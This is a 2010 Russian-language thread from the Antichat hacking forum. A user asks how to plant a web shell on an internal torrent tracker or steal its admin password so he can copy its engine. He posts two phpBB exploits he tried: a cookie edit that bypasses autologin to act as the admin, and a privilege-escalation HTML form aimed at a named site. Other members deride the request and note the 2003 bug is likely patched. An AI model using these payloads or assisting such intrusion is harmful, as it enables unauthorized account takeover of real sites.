Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
20.03.2010, 17:48
|
|
Новичок
Регистрация: 19.03.2010
Сообщений: 9
Провел на форуме:
12419
Репутация:
0
|
|
Помогите с phpRemoteView
Дело в том что мне надо скачать движок нашего в нутре сетевого трекера, и это я хотел сделать с помощью phpRemoteView, залив его на трекер, но я не знаю каким образом его можно там разместить  , надеюсь на вашу помощь))
Заранее спасибо!!! 
если залить его туда нельзя, то подскажите ещё способы как можно украсть движок сайта, или как украсть хешь админа или тупо взломать его)) или скажите тему где подробно все написанно
Движок у сайта TorrentPier 1.xxxx , phpBB только не знаю версию  |
|
|
20.03.2010, 17:51
|
|
Новичок
Регистрация: 19.03.2010
Сообщений: 9
Провел на форуме:
12419
Репутация:
0
|
|
если сочтете нужным перенесите это в другой раздел но прошу не удаляйте ото уже 2 недели ищу как это всё сделать. Или скажите тему в которой этот вопрос можно задать
|
|
|
|
20.03.2010, 19:08
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
попроси админа дать пасс от фтп и логин, законнектся и далее закачай его.
|
|
|
|
20.03.2010, 19:50
|
|
Новичок
Регистрация: 19.03.2010
Сообщений: 9
Провел на форуме:
12419
Репутация:
0
|
|
попугай
смешно)) а может другие способы знаешь?
|
|
|
|
20.03.2010, 19:52
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Если нужен движок, как ты говоришь, то его можно скачать и не ломая серв
http://torrentpier.gt500.net.ua/
|
|
|
|
21.03.2010, 00:14
|
|
Новичок
Регистрация: 19.03.2010
Сообщений: 9
Провел на форуме:
12419
Репутация:
0
|
|
попугай
основа у меня есть ну сам движок torrentpier. Но у них на сайте стоят самые необходимые моды вот я и хочу скачать их доработанный движок с помощью phpRemoteView но не знаю как его им поместить на трекер.
или подскажите Exploit спомощью ктоторого можно выполнить похожие действия
|
|
|
|
21.03.2010, 00:48
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
frost444 как ты думаешь, о чём этот форум?
Все вот эти статьи, какие-то уязвимости, люди которые пытаются что-то ломать, или наоборот обезопасить?
Ты считаешь, что можно просто так на любой сайт закинуть шелл, и хочешь что-бы тебе сейчас в двух словах объяснили как это сделать?
|
|
|
|
21.03.2010, 01:20
|
|
Новичок
Регистрация: 19.03.2010
Сообщений: 9
Провел на форуме:
12419
Репутация:
0
|
|
Jokester
ну можно и не объяснять просто дайте темы в которых можно найти эту информацию)) или подобный эксплоид
или же дайте информацию как зайти от имени администратора или как узнать пароль админа?? я пробовал данные функции но они не работают
Описание уязвимости: Для начала нам следует зарегаться на форуме. Затем, войти под своим аккаунтом и если стоит галка «Автоматический вход»,то убрать её. Нам нужно отредактировать кукисы (посоветую делать это в опере Tools->Advanced->Cookies), вместо
Цитата: a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%2 2%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7 D
X – наш ID , а меняем на
Цитата: a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
2 – как уже говорилось выше, ID админа
Exploit: «a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3B s% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D»
и пробовал этот способ
Код HTML:
<html>
<head><meta http-egufv="content-Type" content="text/html:
charset=windows-1252"><title>root_a_phpbb_2.0.0.pl</title></head.>
<body>
<form mgthod="post"
action="http://riper.am/admin/admin_ug_auth.php">
<p>User Level ; <selected name="userlevel">
<option value="admin" selected="selected">Administrator</option>
<option value="user">User</option>
</select></p>
<input name="private[1]" value="0" type="hidden">
<input name="moderator[1]" value="0" type="hidden">
<input name="mode" value="user" type="hidden">
<input name="adv" value="" type="hidden">
User ID: <input name="u" size="5" type="text"> <br>
<input name="submit" value="Submit" class="mainoption" type="submit">
<input value="reset" class="liteoption" name="reset" type="reset">
</form>
</body></html>
но не чего не помогло
Последний раз редактировалось frost444; 21.03.2010 в 01:28..
|
|
|
|
21.03.2010, 01:32
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
Ну исходя из того что бага 2003го года, то вероятно не работает.. xD
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
21.03.2010, 01:38
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
А вообще интересная схема, пытаться хакнуть движок сплойтом от другого движка =))
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
